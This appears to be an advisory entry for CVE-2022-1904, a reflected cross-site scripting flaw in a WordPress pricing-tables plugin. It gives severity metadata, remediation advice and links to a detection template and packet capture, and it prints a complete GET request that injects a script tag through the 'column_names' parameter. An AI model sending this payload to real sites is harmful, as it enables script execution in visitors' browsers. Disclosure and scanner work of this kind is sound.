| Title | WordPress Easy Pricing Tables <3.2.1 - Cross-Site Scripting |
|---|---|
| Author | Akincibor |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing an attacker to execute malicious scripts on the victim's browser. |
| Remediation | Update to the latest version of WordPress Easy Pricing Tables plugin (3.2.1) to mitigate the vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.02188 |
| CVE ID | CVE-2022-1904 |
| CWE ID | CWE-79 |
| Tags | cve cve2022 wp wordpress wpscan wp-plugin xss fatcatapps vuln |
WordPress Easy Pricing Tables plugin before 3.2.1 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before reflecting it back in a page available to any user both authenticated and unauthenticated when a specific setting is enabled.
GET /wp-admin/admin-ajax.php?action=ptp_design4_color_columns&post_id=1&column_names=<script>alert(document.domain)</script> HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-1904.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-1904.pcap
N/AN/A